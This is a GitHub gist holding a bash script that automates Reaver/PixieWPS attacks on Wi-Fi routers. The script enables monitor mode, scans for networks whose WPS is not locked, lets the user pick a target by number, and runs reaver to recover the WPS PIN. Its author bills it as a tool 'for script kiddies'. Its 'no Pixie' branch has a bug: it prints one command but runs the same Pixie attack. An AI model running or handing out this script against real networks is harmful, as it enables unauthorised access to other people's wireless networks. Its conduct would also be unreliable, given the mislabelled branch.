Skip to content

Instantly share code, notes, and snippets.

@olmedocr
Last active April 6, 2018 11:39
Show Gist options
  • Save olmedocr/15dc483ecb86b79a10a82884eda7eaee to your computer and use it in GitHub Desktop.
Save olmedocr/15dc483ecb86b79a10a82884eda7eaee to your computer and use it in GitHub Desktop.
Script to launch reaver/PixieWPS attacks with minimal user interaction. For script kiddies, by a script kiddie.
#!/usr/bin/env bash
# Script to launch reaver/PixieWPS attacks with minimal user interaction. For script kiddies, by a script kiddie
# Copyright (C) 2018 Raul Olmedo - All Rights Reserved
# Do whatever you want with this
# Last revised 6/4/2018
FLAG_END=0
airmon-ng start wlan0
echo "Listing nearby networks, please wait 10 seconds"
timeout 10s wash -i wlan0mon > wps_all_networks.txt
# Sort the list by power and discard the ones that have the WPS locked
sort -k 3 < wps_all_networks.txt | grep "No" | nl > wps_hackable_networks.txt
while [ $FLAG_END = 0 ]
do
clear
cat wps_hackable_networks.txt
echo "Select a network to crack [1, 2, 3...]: "
read SELECTED_NETWORK_NUMBER
clear
# Parse the BSSD and CHANNEL of the selected network
BSSD=`awk -v selected_network_number="$SELECTED_NETWORK_NUMBER" '$1 == selected_network_number {print $2}' < wps_hackable_networks.txt`
CHANNEL=`awk -v selected_network_number="$SELECTED_NETWORK_NUMBER" '$1 == selected_network_number {print $3}' < wps_hackable_networks.txt`
echo "Do you want to execute a pixieWPS attack? [y/n]"
read ATTACK_TYPE
if [ "$ATTACK_TYPE" = "y" ]
then
echo "Executing reaver -i wlan0mon -b $BSSD -c $CHANNEL -K 1 -Z -vvv"
reaver -i wlan0mon -b $BSSD -c $CHANNEL -K 1 -Z -vvv
elif [ "$ATTACK_TYPE" = "n" ]
then
echo "Executing reaver -i wlan0mon -b $BSSD -c $CHANNEL -vvv"
reaver -i wlan0mon -b $BSSD -c $CHANNEL -K 1 -Z -vvv
else
echo "Wrong option"
fi
echo "Do you want to try another network? [y/n]: "
read KEEP_TRYING
if [ "$KEEP_TRYING" = "y" ]
then
FLAG_END=0
elif [ "$KEEP_TRYING" = "n" ]
then
FLAG_END=1
else
echo "Wrong option"
fi
done
echo "Cleaning files..."
rm wps_all_networks.txt
rm wps_hackable_networks.txt
echo "Finished"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment